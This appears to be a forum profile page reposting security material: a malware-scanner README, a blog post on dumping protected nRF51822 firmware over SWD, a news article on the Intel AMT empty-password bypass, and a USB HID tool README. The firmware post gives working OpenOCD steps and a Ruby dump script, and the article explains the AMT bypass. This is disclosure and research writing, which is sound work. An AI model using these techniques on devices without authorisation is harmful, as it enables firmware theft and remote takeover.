-
Posts
18772 -
Joined
-
Last visited
-
Days Won
730
Everything posted by Nytro
-
Web Exploit Detector Introduction The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it. As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed. The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules. Links My website: https://www.polaris64.net/ My cybersecurity blog, which contains articles describing some of these exploits and how to remove them: https://www.polaris64.net/blog/cyber-security Contact me NPM module Installation Regular users The simplest way to install Web Exploit Detector is as a global NPM module: - npm install -g web_exploit_detector If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector). Updating The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: - npm update -g web_exploit_detector Again, you may have to use the sudo command as above. Technical users You can also clone the Git repository and run the script directly like so: - git clone https://github.com/polaris64/web_exploit_detector cd web_exploit_detector npm install Running From NPM module If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): - wed-scanner --webroot=/var/www/html Other command-line options are available, simply run wed-scanner --help to see a help message describing them. Running the script in this way will produce human-readable output to the console. This is very useful when running the script with cron for example as the output can be sent as an e-mail whenever the script runs. The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument. From cloned Git repository Simply call the script via node and pass the path to your webroot as follows: - node index.js --webroot=/var/www/html Recursive directory snapshots The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way. Snapshots A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the point in which the snapshot was created. If a snapshot was generated on Monday, for example, and then the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities therefore is to allow these snapshots to be created and for the comparisons to be performed when required. The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents. Usage The following two utilities are also installed as part of Web Exploit Detector: - wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option. wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used. Workflow Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly as new uploads will cause the new state to change from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely ensure nothing actually does change. Usage as a module The src/web-exploit-detector.js script is an ES6 module that exports the set of rules as rules as well as a number of functions: - executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script. formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test. getFileList(path): returns an array of files from the base path using readDirRecursive(). processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path). readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories. The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used. The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead. Building The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts. The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application. Excluding results per rule Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included. The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file. For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option. For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory. Rule engine The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests. Each individual test must be one of the following: - A regular expression: the simplest type of test, any value matching the regex will pass the test. A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations. A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations. The following test types are supported: - "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule. "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations. Expanding on the rules As web-based exploits are constantly evolving and new exploits are being created, the set of rules need to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible! This brings me onto the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date. Contributing rules If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request. Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it. Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID. Unit tests and linting The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint. When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used. Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed. Credits Thanks to the Reddit user mayupvoterandomly for suggesting the directory snapshot functionality that was added in 1.1.0 and for suggesting new rules that will be added soon. License ISC License Copyright (c) 2017, Simon Pugnet Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. Sursa: https://github.com/polaris64/web_exploit_detector
-
Firmware dumping technique for an ARM Cortex-M0 SoC by Kris Brosch One of the first major goals when reversing a new piece of hardware is getting a copy of the firmware. Once you have access to the firmware, you can reverse engineer it by disassembling the machine code. Sometimes you can get access to the firmware without touching the hardware, by downloading a firmware update file for example. More often, you need to interact with the chip where the firmware is stored. If the chip has a debug port that is accessible, it may allow you to read the firmware through that interface. However, most modern chips have security features that when enabled, prevent firmware from being read through the debugging interface. In these situations, you may have to resort to decapping the chip, or introducing glitches into the hardware logic by manipulating inputs such as power or clock sources and leveraging the resulting behavior to successfully bypass these security implementations. This blog post is a discussion of a new technique that we've created to dump the firmware stored on a particular Bluetooth system-on-chip (SoC), and how we bypassed that chip's security features to do so by only using the debugging interface of the chip. We believe this technique is a vulnerability in the code protection features of this SoC and as such have notified the IC vendor prior to publication of this blog post. The SoC The SoC in question is a Nordic Semiconductor nRF51822. The nRF51822 is a popular Bluetooth SoC with an ARM Cortex-M0 CPU core and built-in Bluetooth hardware. The chip's manual is available here. Chip security features that prevent code readout vary in implementation among the many microcontrollers and SoCs available from various manufacturers, even among those that use the same ARM cores. The nRF51822's code protection allows the developer to prevent the debugging interface from being able to read either all of code and memory (flash and RAM) sections, or a just a subsection of these areas. Additionally, some chips have options to prevent debugger access entirely. The nRF51822 doesn't provide such a feature to developers; it just disables memory accesses through the debugging interface. The nRF51822 has a serial wire debug (SWD) interface, a two-wire (in addition to ground) debugging interface available on many ARM chips. Many readers may be familiar with JTAG as a physical interface that often provides access to hardware and software debugging features of chips. Some ARM cores support a debugging protocol that works over the JTAG physical interface; SWD is a different physical interface that can be used to access the same software debugging features of a chip that ARM JTAG does. OpenOCD is an open source tool that can be used to access the SWD port. This document contains a pinout diagram of the nRF51822. Luckily the hardware target we were analyzing has test points connected to the SWDIO and SWDCLK chip pins with PCB traces that were easy to follow. By connecting to these test points with a SWD adapter, we can use OpenOCD to access the chip via SWD. There are many debug adapters supported by OpenOCD, some of which support SWD. Exploring the Debugger Access Once OpenOCD is connected to the target, we can run debugging commands, and read/write some ARM registers, however we are prevented from reading out the code section. In the example below, we connect to the target with OpenOCD and attempt to read memory sections from the target chip. We proceed to reset the processor and read from the address 0x00000000 and the address that we determine is in the program counter (pc) register (0x000114cc), however nothing but zeros is returned. Of course we know there is code there, but the code protection counter-measures are preventing us from accessing it: > reset halt target state: halted target halted due to debug-request, current mode: Thread xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0 > mdw 0x00000000 0x00000000: 00000000 > mdw 0x000114cc 10 0x000114cc: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 0x000114ec: 00000000 00000000 We can however read and write CPU registers, including the program counter (pc), and we can single-step through instructions (we just don't know what instructions, since we can't read them): > reg r0 0x12345678 r0 (/32): 0x12345678 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0 > reg pc 0x00011500 pc (/32): 0x00011500 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x00011502 msp: 0x20001bd0 We can also read a few of the memory-mapped configuration registers. Here we are reading a register named "RBPCONF" (short for readback protection) in a collection of registers named "UICR" (User Information Configuration Registers); you can find the address of this register in the nRF51 Series Reference Manual: > mdw 0x10001004 0x10001004: ffff00ff According to the manual, a value of 0xffff00ff in the RBPCONF register means "Protect all" (PALL) is enabled (bits 15..8, labeled "B" in this table, are set to 0), and "Protect region 0" (PR0) is disabled (bits 7..0, labeled "A", are set to1): The PALL feature being enabled is what is responsible for preventing us from accessing the code section and subsequently causing our read commands to return zeros. The other protection feature, PR0, is not enabled in this case, but it's worth mentioning because the protection bypass discussed in this article could bypass PR0 as well. If enabled, it would prevent the debugger from reading memory below a configurable address. Note that flash (and therefore the firmware we want) exists at a lower address than RAM. PR0 also prevents code running outside of the protected region from reading any data within the protected region. Unfortunately, it is not possible to disable PALL without erasing the entire chip, wiping away the firmware with it. However, it is possible to bypass this readback protection by leveraging our debug access to the CPU. Devising a Protection Bypass An initial plan to dump the firmware via a debugging interface might be to load some code into RAM that reads the firmware from flash into a RAM buffer that we could then read. However, we don't have access to RAM because PALL is enabled. Even if PALL were disabled, PR0 could have been enabled, which would prevent our code in RAM (which would be the unprotected region) from reading flash (in the protected region). This plan won't work if either PALL or PR0 is enabled. To bypass the memory protections, we need a way to read the protected data and we need a place to write it that we can access. In this case, only code that exists in protected memory can read protected memory. So our method of reading data will be to jump to an instruction in protected memory using our debugger access, and then to execute that instruction. The instruction will read the protected data into a CPU register, at which time we can then read the value out of the CPU register using our debugger access. How do we know what instruction to jump to? We'll have to blindly search protected memory for a load instruction that will read from an address we supply in a register. Once we've found such an instruction, we can exploit it to read out all of the firmware. Finding a Load Instruction Our debugger access lets us write to the pc register in order to jump to any instruction, and it lets us single step the instruction execution. We can also read and write the contents of the general purpose CPU registers. In order to read from the protected memory, we have to find a load word instruction with a register operand, set the operand register to a target address, and execute that one instruction. Since we can't read the flash, we don't know what instructions are where, so it might seem difficult to find the right instruction. However, all we need is an instruction that reads memory from an address in some register to a register, which is a pretty common operation. A load word instruction would work, or a pop instruction, for example. We can search for the right instruction using trial and error. First, we set the program counter to somewhere we guess a useful instruction might be. Then, we set all the CPU registers to an address we're interested in and then single step. Next we examine the registers. If we are lucky, the instruction we just executed loaded data from an address stored in another register. If one of the registers has changed to a value that might exist at the target address, then we may have found a useful load instruction. We might as well start at the reset vector - at least we know there are valid instructions there. Here we're resetting the CPU, setting the general purpose registers and stack pointer to zero (the address we're trying), and single stepping, then examining the registers: > reset halt target state: halted target halted due to debug-request, current mode: Thread xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0 > reg r0 0x00000000 r0 (/32): 0x00000000 > reg r1 0x00000000 r1 (/32): 0x00000000 > reg r2 0x00000000 r2 (/32): 0x00000000 > reg r3 0x00000000 r3 (/32): 0x00000000 > reg r4 0x00000000 r4 (/32): 0x00000000 > reg r5 0x00000000 r5 (/32): 0x00000000 > reg r6 0x00000000 r6 (/32): 0x00000000 > reg r7 0x00000000 r7 (/32): 0x00000000 > reg r8 0x00000000 r8 (/32): 0x00000000 > reg r9 0x00000000 r9 (/32): 0x00000000 > reg r10 0x00000000 r10 (/32): 0x00000000 > reg r11 0x00000000 r11 (/32): 0x00000000 > reg r12 0x00000000 r12 (/32): 0x00000000 > reg sp 0x00000000 sp (/32): 0x00000000 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114ce msp: 00000000 > reg ===== arm v7m registers (0) r0 (/32): 0x00000000 (1) r1 (/32): 0x00000000 (2) r2 (/32): 0x00000000 (3) r3 (/32): 0x10001014 (4) r4 (/32): 0x00000000 (5) r5 (/32): 0x00000000 (6) r6 (/32): 0x00000000 (7) r7 (/32): 0x00000000 (8) r8 (/32): 0x00000000 (9) r9 (/32): 0x00000000 (10) r10 (/32): 0x00000000 (11) r11 (/32): 0x00000000 (12) r12 (/32): 0x00000000 (13) sp (/32): 0x00000000 (14) lr (/32): 0xFFFFFFFF (15) pc (/32): 0x000114CE (16) xPSR (/32): 0xC1000000 (17) msp (/32): 0x00000000 (18) psp (/32): 0xFFFFFFFC (19) primask (/1): 0x00 (20) basepri (/8): 0x00 (21) faultmask (/1): 0x00 (22) control (/2): 0x00 ===== Cortex-M DWT registers (23) dwt_ctrl (/32) (24) dwt_cyccnt (/32) (25) dwt_0_comp (/32) (26) dwt_0_mask (/4) (27) dwt_0_function (/32) (28) dwt_1_comp (/32) (29) dwt_1_mask (/4) (30) dwt_1_function (/32) Looks like r3 was set to 0x10001014. Is that the value at address zero? Let's see what happens when we load the registers with four instead: > reset halt target state: halted target halted due to debug-request, current mode: Thread xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0 > reg r0 0x00000004 r0 (/32): 0x00000004 > reg r1 0x00000004 r1 (/32): 0x00000004 > reg r2 0x00000004 r2 (/32): 0x00000004 > reg r3 0x00000004 r3 (/32): 0x00000004 > reg r4 0x00000004 r4 (/32): 0x00000004 > reg r5 0x00000004 r5 (/32): 0x00000004 > reg r6 0x00000004 r6 (/32): 0x00000004 > reg r7 0x00000004 r7 (/32): 0x00000004 > reg r8 0x00000004 r8 (/32): 0x00000004 > reg r9 0x00000004 r9 (/32): 0x00000004 > reg r10 0x00000004 r10 (/32): 0x00000004 > reg r11 0x00000004 r11 (/32): 0x00000004 > reg r12 0x00000004 r12 (/32): 0x00000004 > reg sp 0x00000004 sp (/32): 0x00000004 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114ce msp: 0x00000004 > reg ===== arm v7m registers (0) r0 (/32): 0x00000004 (1) r1 (/32): 0x00000004 (2) r2 (/32): 0x00000004 (3) r3 (/32): 0x10001014 (4) r4 (/32): 0x00000004 (5) r5 (/32): 0x00000004 (6) r6 (/32): 0x00000004 (7) r7 (/32): 0x00000004 (8) r8 (/32): 0x00000004 (9) r9 (/32): 0x00000004 (10) r10 (/32): 0x00000004 (11) r11 (/32): 0x00000004 (12) r12 (/32): 0x00000004 (13) sp (/32): 0x00000004 (14) lr (/32): 0xFFFFFFFF (15) pc (/32): 0x000114CE (16) xPSR (/32): 0xC1000000 (17) msp (/32): 0x00000004 (18) psp (/32): 0xFFFFFFFC (19) primask (/1): 0x00 (20) basepri (/8): 0x00 (21) faultmask (/1): 0x00 (22) control (/2): 0x00 ===== Cortex-M DWT registers (23) dwt_ctrl (/32) (24) dwt_cyccnt (/32) (25) dwt_0_comp (/32) (26) dwt_0_mask (/4) (27) dwt_0_function (/32) (28) dwt_1_comp (/32) (29) dwt_1_mask (/4) (30) dwt_1_function (/32) Nope, r3 gets the same value, so we're not interested in the first instruction. Let's continue on to the second: > reg r0 0x00000000 r0 (/32): 0x00000000 > reg r1 0x00000000 r1 (/32): 0x00000000 > reg r2 0x00000000 r2 (/32): 0x00000000 > reg r3 0x00000000 r3 (/32): 0x00000000 > reg r4 0x00000000 r4 (/32): 0x00000000 > reg r5 0x00000000 r5 (/32): 0x00000000 > reg r6 0x00000000 r6 (/32): 0x00000000 > reg r7 0x00000000 r7 (/32): 0x00000000 > reg r8 0x00000000 r8 (/32): 0x00000000 > reg r9 0x00000000 r9 (/32): 0x00000000 > reg r10 0x00000000 r10 (/32): 0x00000000 > reg r11 0x00000000 r11 (/32): 0x00000000 > reg r12 0x00000000 r12 (/32): 0x00000000 > reg sp 0x00000000 sp (/32): 0x00000000 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114d0 msp: 00000000 > reg ===== arm v7m registers (0) r0 (/32): 0x00000000 (1) r1 (/32): 0x00000000 (2) r2 (/32): 0x00000000 (3) r3 (/32): 0x20001BD0 (4) r4 (/32): 0x00000000 (5) r5 (/32): 0x00000000 (6) r6 (/32): 0x00000000 (7) r7 (/32): 0x00000000 (8) r8 (/32): 0x00000000 (9) r9 (/32): 0x00000000 (10) r10 (/32): 0x00000000 (11) r11 (/32): 0x00000000 (12) r12 (/32): 0x00000000 (13) sp (/32): 0x00000000 (14) lr (/32): 0xFFFFFFFF (15) pc (/32): 0x000114D0 (16) xPSR (/32): 0xC1000000 (17) msp (/32): 0x00000000 (18) psp (/32): 0xFFFFFFFC (19) primask (/1): 0x00 (20) basepri (/8): 0x00 (21) faultmask (/1): 0x00 (22) control (/2): 0x00 ===== Cortex-M DWT registers (23) dwt_ctrl (/32) (24) dwt_cyccnt (/32) (25) dwt_0_comp (/32) (26) dwt_0_mask (/4) (27) dwt_0_function (/32) (28) dwt_1_comp (/32) (29) dwt_1_mask (/4) (30) dwt_1_function (/32) OK, this time r3 was set to 0x20001BD0. Is that the value at address zero? Let's see what happens when we run the second instruction with the registers set to 4: > reset halt target state: halted target halted due to debug-request, current mode: Thread xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0 > reg r0 0x00000004 r0 (/32): 0x00000004 > reg r1 0x00000004 r1 (/32): 0x00000004 > reg r2 0x00000004 r2 (/32): 0x00000004 > reg r3 0x00000004 r3 (/32): 0x00000004 > reg r4 0x00000004 r4 (/32): 0x00000004 > reg r5 0x00000004 r5 (/32): 0x00000004 > reg r6 0x00000004 r6 (/32): 0x00000004 > reg r7 0x00000004 r7 (/32): 0x00000004 > reg r8 0x00000004 r8 (/32): 0x00000004 > reg r9 0x00000004 r9 (/32): 0x00000004 > reg r10 0x00000004 r10 (/32): 0x00000004 > reg r11 0x00000004 r11 (/32): 0x00000004 > reg r12 0x00000004 r12 (/32): 0x00000004 > reg sp 0x00000004 sp (/32): 0x00000004 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x00000004 > reg ===== arm v7m registers (0) r0 (/32): 0x00000004 (1) r1 (/32): 0x00000004 (2) r2 (/32): 0x00000004 (3) r3 (/32): 0x000114CD (4) r4 (/32): 0x00000004 (5) r5 (/32): 0x00000004 (6) r6 (/32): 0x00000004 (7) r7 (/32): 0x00000004 (8) r8 (/32): 0x00000004 (9) r9 (/32): 0x00000004 (10) r10 (/32): 0x00000004 (11) r11 (/32): 0x00000004 (12) r12 (/32): 0x00000004 (13) sp (/32): 0x00000004 (14) lr (/32): 0xFFFFFFFF (15) pc (/32): 0x000114D0 (16) xPSR (/32): 0xC1000000 (17) msp (/32): 0x00000004 (18) psp (/32): 0xFFFFFFFC (19) primask (/1): 0x00 (20) basepri (/8): 0x00 (21) faultmask (/1): 0x00 (22) control (/2): 0x00 ===== Cortex-M DWT registers (23) dwt_ctrl (/32) (24) dwt_cyccnt (/32) (25) dwt_0_comp (/32) (26) dwt_0_mask (/4) (27) dwt_0_function (/32) (28) dwt_1_comp (/32) (29) dwt_1_mask (/4) (30) dwt_1_function (/32) This time, r3 got 0x00014CD. This value actually strongly implies we're reading memory. Why? The value is actually the reset vector. According to the Cortex-M0 documentation, the reset vector is at address 4, and when we reset the chip, the PC is set to 0x000114CC (the least significant bit is set in the reset vector, changing C to D, because the Cortex-M0 operates in Thumb mode). Let's try reading the two instructions we just were testing: > reset halt target state: halted target halted due to debug-request, current mode: Thread xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0 > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0 > reg r0 0x000114cc r0 (/32): 0x000114CC > reg r1 0x000114cc r1 (/32): 0x000114CC > reg r2 0x000114cc r2 (/32): 0x000114CC > reg r3 0x000114cc r3 (/32): 0x000114CC > reg r4 0x000114cc r4 (/32): 0x000114CC > reg r5 0x000114cc r5 (/32): 0x000114CC > reg r6 0x000114cc r6 (/32): 0x000114CC > reg r7 0x000114cc r7 (/32): 0x000114CC > reg r8 0x000114cc r8 (/32): 0x000114CC > reg r9 0x000114cc r9 (/32): 0x000114CC > reg r10 0x000114cc r10 (/32): 0x000114CC > reg r11 0x000114cc r11 (/32): 0x000114CC > reg r12 0x000114cc r12 (/32): 0x000114CC > reg sp 0x000114cc sp (/32): 0x000114CC > step target state: halted target halted due to single-step, current mode: Thread xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x000114cc > reg r3 r3 (/32): 0x681B4B13 The r3 register has the value 0x681B4B13. That disassembles to two load instructions, the first relative to the pc, the second relative to r3: $ printf "\x13\x4b\x1b\x68" > /tmp/armcode $ arm-none-eabi-objdump -D --target binary -Mforce-thumb -marm /tmp/armcode /tmp/armcode: file format binary Disassembly of section .data: 00000000 <.data>: 0: 4b13 ldr r3, [pc, #76] ; (0x50) 2: 681b ldr r3, [r3, #0] In case you don't read Thumb assembly, that second instruction is a load register instruction (ldr); it's taking an address from the r3 register, adding an offset of zero, and loading the value from that address into the r3 register. We've found a load instruction that lets us read memory from an arbitrary address. Again, this is useful because only code in the protected memory can read the protected memory. The trick is that being able to read and write CPU registers using OpenOCD lets us execute those instructions however we want. If we hadn't been lucky enough to find the load word instruction so close to the reset vector, we could have reset the processor and written a value to the pc register (jumping to an arbitrary address) to try more instructions. Since we were lucky though, we can just step through the first instruction. Dumping the Firmware Now that we've found a load instruction that we can execute to read from arbitrary addresses, our firmware dumping process is as follows: Reset the CPU Single step (we don't care about the first instruction) Put the address we want to read from into r3 Single step (this loads from the address in r3 to r3) Read the value from r3 Here's a ruby script to automate the process: #!/usr/bin/env ruby require 'net/telnet' debug = Net::Telnet::new("Host" => "localhost", "Port" => 4444) dumpfile = File.open("dump.bin", "w") ((0x00000000/4)...(0x00040000)/4).each do |i| address = i * 4 debug.cmd("reset halt") debug.cmd("step") debug.cmd("reg r3 0x#{address.to_s 16}") debug.cmd("step") response = debug.cmd("reg r3") value = response.match(/: 0x([0-9a-fA-F]{8})/)[1].to_i 16 dumpfile.write([value].pack("V")) puts "0x%08x: 0x%08x" % [address, value] end dumpfile.close debug.close The ruby script connects to the OpenOCD user interface, which is available via a telnet connection on localhost. It then loops through addresses that are multiples of four, using the load instruction we found to read data from those addresses. Vendor Response IncludeSec contacted NordicSemi via their customer support channel where they received a copy of this blog post. From NordicSemi customer support: "We take this into consideration together with other factors, and the discussions around this must be kept internal." We additionally reached out to the only engineer who had security in his title and he didn't really want a follow-up Q&A call or further info and redirected us to only talk to customer support. So that's about all we can do for coordinated disclosure on our side. Conclusion Once we have a copy of the firmware image, we can do whatever disassembly or reverse engineering we want with it. We can also now disable the chip's PALL protection in order to more easily debug the code. To disable PALL, you need to erase the chip, but that's not a problem since we can immediately re-flash the chip using the dumped firmware. Once that the chip has been erased and re-programmed to disable the protection we can freely use the debugger to: read and write RAM, set breakpoints, and so on. We can even attach GDB to OpenOCD, and debug the firmware that way. The technique described here won't work on all microcontrollers or SoCs; it only applies to situations where you have access to a debugging interface that can read and write CPU registers but not protected memory. Despite the limitation though, the technique can be used to dump firmware from nRF51822 chips and possibly others that use similar protections. We feel this is a vulnerability in the design of the nRF51822 code protection. Are you using other cool techniques to dump firmware? Do you know of any other microcontrollers or SoCs that might be vulnerable to this type of code protection bypass? Let us know in the comments. Sursa: http://blog.includesecurity.com/2015/11/NordicSemi-ARM-SoC-Firmware-dumping-technique.html
-
How to remote hijack computers using Intel's insecure chips
Nytro posted a topic in Stiri securitate
How to remote hijack computers using Intel's insecure chips: Just use an empty login string Exploit to pwn systems using vPro and AMT now public 5 May 2017 at 19:52, Chris Williams You can remotely commandeer and control workstations and servers that use vulnerable Intel chipsets – by sending them empty authentication strings. You read that right. When you're expected to send a password hash, you send zero bytes. Nada. And you'll be rewarded with powerful low-level access to the box's hardware from across the network – or across the internet if the management interface faces the public web. Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this technology is part of Chipzilla's vPro suite and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using. It's designed to allow IT admins to remotely log into the guts of computers so they can reboot them, repair and tweak operating systems, install new OSes, access virtual serial consoles, or gain full-blown remote desktop access to the machines via VNC. It is, essentially, god-mode on a machine. Normally, AMT is password protected. This week it emerged that this authentication can be bypassed, allowing miscreants to take over systems from afar or once inside a corporate network. This critical security bug was designated CVE-2017-5689. While Intel has patched its code, people have to extract the necessary firmware updates from their hardware suppliers before they can be installed. Today we've learned it is trivial to exploit this flaw – and we're still waiting for those patches. AMT is accessed over the network via a bog-standard web interface. This prompts the admin for a password, and this passphrase is sent over by the web browser using standard HTTP Digest authentication: the username, password, and realm, are hashed using a nonce from the AMT firmware, plus a few other bits of metadata. This scrambled response is checked by Intel's AMT software to be valid, and if so, access to granted to the management interface. But if you send an empty response, the firmware thinks this is valid and lets you through. This means if you use a proxy, or otherwise set up your browser to send empty HTTP Digest authentication responses, you can bypass the password checks. This is according to firmware reverse-engineering by Embedi [PDF] which reported the flaw to Intel in March, and Tenable, which poked around and came to the same conclusion earlier this week. Intel has published some more info on the vulnerability here, which includes links to a tool to check if your system is at-risk here, and mitigations. We're told the flaw is present in some, but not all, Intel chipsets back to 2010: if you're using vPro and AMT versions 6 to 11.6 on your network – including Intel's Standard Manageability (ISM) and Small Business Technology (SBT) features – then you are potentially at risk. Sursa: https://www.theregister.co.uk/2017/05/05/intel_amt_remote_exploit/- 1 reply
-
- 1
-
-
Hidviz Hidviz is a GUI application for in-depth analysis of USB HID class devices. The 2 main usecases of this aplication are reverse-engineering existing devices and developing new USB HID devices. USB HID class consists of many possible devices, e.g. mice, keyboards, joysticks and gamepads. But that's not all! There are more exotic HID devices, e.g. weather stations, medical equipment (thermometers, blood pressure monitors) or even simulation devices (think of flight sticks!). 1) Building Hidviz can be built on various platforms where following prerequisities can be obtained. Currently only Fedora, Ubuntu and MSYS2/Windows are supported and build guide is available for them. 1.1) Prerequisities C++ compiler with C++14 support libusb 1.0 (can be called libusbx in you distro) protobuf (v2 is enough) Qt5 base CMake (>=3.2) 1.1.1) Installing prerequisities on Fedora sudo dnf install gcc-c++ gcc qt5-qtbase-devel protobuf-devel libusbx-devel 1.1.2) Installing prerequisities on Ubuntu sudo apt-get install build-essential qtbase5-dev libprotobuf-dev protobuf-compiler libusb-1.0-0-dev Note that Ubuntu 14.04 LTS has old gcc unable to build hidviz, you need to install at least gcc 5. 1.1.3) Installing prerequisities on MSYS2/Windows Please note hidviz is primarily developed on Linux and we currently don't have Windows CI therefore Windows build can be broken at any time. If you find so, please create an issue. If you do not have MSYS2 installed, firstly follow this guide to install MSYS2. pacman -S git mingw-w64-x86_64-cmake mingw-w64-x86_64-qt5 mingw-w64-x86_64-libusb \ mingw-w64-x86_64-protobuf mingw-w64-x86_64-protobuf-c mingw-w64-x86_64-toolchain \ make 1.2) Clone and prepare out of source build Firstly you need to obtain sources from git and prepare directory for out of source build: git clone --recursive https://github.com/ondrejbudai/hidviz.git mkdir hidviz/build cd hidviz/build Please note you have to do recursive clone. 1.3) Configuring 1.2.1) Configuring on Fedora/Ubuntu (Linux) cmake .. 1.2.2) Configuring on MSYS2/Windows cmake -G "Unix Makefiles" .. 1.4) Build make -j$(nproc) If you are doing MSYS2 build, check before build you are using MinGW32/64 shell, otherwise the build process won't work. More information can be found here. 2) Running To run this project you need build/hidviz as you current directory for hidviz to work properly! After successful build you need to run cd 